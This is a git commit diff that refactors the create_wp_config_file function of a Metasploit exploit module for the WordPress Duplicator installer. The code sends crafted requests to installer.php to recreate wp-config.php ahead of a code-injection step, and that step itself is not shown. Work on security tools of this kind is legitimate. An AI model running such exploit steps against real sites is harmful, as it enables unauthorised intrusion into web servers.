Cleaned the create_wp_config_file function

2018-12-05 10:56:22 +01:00 · 2018-12-05 10:56:22 +01:00 · 224e782772
parent 2774c17ca1
commit 224e782772
1 changed files with 28 additions and 25 deletions
--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@ -77,32 +77,35 @@ class MetasploitModule < Msf::Exploit::Remote
  def create_wp_config_file
    # 1. GET the installer.php to retrieve the archive name.
    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
-    if response && response.code == 200
-      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
-      archive_name = archive_name.first.first
-      print_status("Found archive name #{archive_name}")
-      # 2. Perform the 1st step to actually create the wp-config.php file.
-      response = send_request_cgi({
-        'method' => 'POST',
-        'uri'    => normalize_uri(datastore['TARGETURI']),
-        'vars_post'   => {
-          'action_ajax' => "1",
-          'action_step' => "1",
-          'archive_name' => archive_name,
-          'archive_engine' => "ziparchive",
-          'exe_safe_mode' => "0",
-          'archive_filetime' => "current",
-          'logging' => "1"
-        }
-      }, timeout=datastore['TIMEOUT'])
-      if response && response.code == 200
-        print_status("Successfully created the wp-config.php file!")
-      else
-        fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
-      end
-    else
+    unless response && response.code == 200
      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
    end
+    archive_name = response.body.to_s.scan(/value="([^"]*.zip)"/).flatten.first
+    if archive_name.blank?
+      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
+    end
+
+    print_status("Found archive name #{archive_name}")
+
+    # 2. Perform the 1st step to actually create the wp-config.php file.
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'vars_post'   => {
+        'action_ajax' => "1",
+        'action_step' => "1",
+        'archive_name' => archive_name,
+        'archive_engine' => "ziparchive",
+        'exe_safe_mode' => "0",
+        'archive_filetime' => "current",
+        'logging' => "1"
+      }
+    }, timeout=datastore['TIMEOUT'])
+    unless response && response.code == 200
+      fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
+    end
+
+    print_status("Successfully created the wp-config.php file!")
  end

  def exploit
@ -112,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote

    if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
      print_status("This WordPress was not restored. Creating the wp-config.php file...")
-      create_wp_config_file()
+      create_wp_config_file
    end

    # 2. Exploit the code injection.